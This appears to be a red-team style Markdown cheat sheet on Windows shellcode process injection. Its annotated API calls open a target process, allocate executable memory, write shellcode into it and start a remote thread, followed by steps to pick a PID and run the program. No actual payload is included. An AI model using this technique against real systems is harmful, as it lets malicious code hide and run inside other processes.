56 lines
1.2 KiB
Markdown
56 lines
1.2 KiB
Markdown
|
# Process Injection
|
||
|
|
|
||
|
|
## Shellcode injection
|
||
|
|
|
||
|
|
* Open a process
|
||
|
|
```sh
|
||
|
|
processHandle = OpenProcess(
|
||
|
|
PROCESS_ALL_ACCESS, // Defines access rights
|
||
|
|
FALSE, // Target handle will not be inhereted
|
||
|
|
DWORD(atoi(argv[1])) // Local process supplied by command-line arguments
|
||
|
|
);
|
||
|
|
```
|
||
|
|
|
||
|
|
* Allocate memory
|
||
|
|
```sh
|
||
|
|
remoteBuffer = VirtualAllocEx(
|
||
|
|
processHandle, // Opened target process
|
||
|
|
NULL,
|
||
|
|
sizeof shellcode, // Region size of memory allocation
|
||
|
|
(MEM_RESERVE | MEM_COMMIT), // Reserves and commits pages
|
||
|
|
PAGE_EXECUTE_READWRITE // Enables execution and read/write access to the commited pages
|
||
|
|
);
|
||
|
|
```
|
||
|
|
|
||
|
|
* Write shellcode to memory allocated
|
||
|
|
```sh
|
||
|
|
WriteProcessMemory(
|
||
|
|
processHandle, // Opened target process
|
||
|
|
remoteBuffer, // Allocated memory region
|
||
|
|
shellcode, // Data to write
|
||
|
|
sizeof shellcode, // byte size of data
|
||
|
|
NULL
|
||
|
|
);
|
||
|
|
```
|
||
|
|
|
||
|
|
* Execute shellcode inside a created thread
|
||
|
|
```sh
|
||
|
|
remoteThread = CreateRemoteThread(
|
||
|
|
processHandle, // Opened target process
|
||
|
|
NULL,
|
||
|
|
0, // Default size of the stack
|
||
|
|
(LPTHREAD_START_ROUTINE)remoteBuffer, // Pointer to the starting address of the thread
|
||
|
|
NULL,
|
||
|
|
0, // Ran immediately after creation
|
||
|
|
NULL
|
||
|
|
);
|
||
|
|
```
|
||
|
|
|
||
|
|
* Compile
|
||
|
|
* Check processes via
|
||
|
|
```sh
|
||
|
|
Get-Process -IncludeUserName
|
||
|
|
```
|
||
|
|
* Run on process ID as argv1
|
||
|
|
|